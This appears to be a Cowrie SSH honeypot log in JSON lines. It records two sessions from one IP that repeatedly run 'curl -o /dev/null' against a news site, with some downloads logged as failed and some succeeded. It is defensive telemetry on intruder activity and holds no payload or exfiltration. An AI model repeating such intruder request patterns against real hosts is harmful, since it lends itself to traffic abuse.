{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.499175Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.500149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.502525Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.503496Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.526569Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.527968Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.581001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.582069Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.584623Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.586378Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.608055Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.638987Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.640235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.645318Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.646690Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.647516Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.658548Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.663021Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.692180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.693196Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.701204Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.702056Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.705505Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.742961Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.744108Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.745956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.749332Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.754972Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.755763Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.785984Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.786736Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.791056Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.797135Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.798029Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.821338Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.822738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.823695Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.836586Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.837526Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.838751Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.843432Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.861738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.862799Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.880060Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.881030Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.890535Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.892936Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.902591Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.903567Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.929502Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.930541Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.948217Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.948912Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.950969Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.967172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.978143Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.979152Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.997647Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.998550Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.000662Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.001710Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.024704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.025693Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.031210Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.037319Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.038946Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.046005Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.047017Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.064946Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.075438Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.077275Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.078262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.095593Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.096481Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.113866Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.127475Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.128443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.141265Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.145442Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.146356Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.163319Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.165928Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.169519Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.176414Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.177976Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.187089Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.188776Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.203455Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.204773Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.217665Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.218521Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.233093Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.242060Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.243004Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.256872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.257747Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.277507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.278314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.295467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.296573Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.309379Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.316451Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.317452Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.360841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.362034Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.379137Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.380197Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.413683Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.414720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.425414Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.426338Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.437881Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.459117Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:53.460142Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:53.468288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
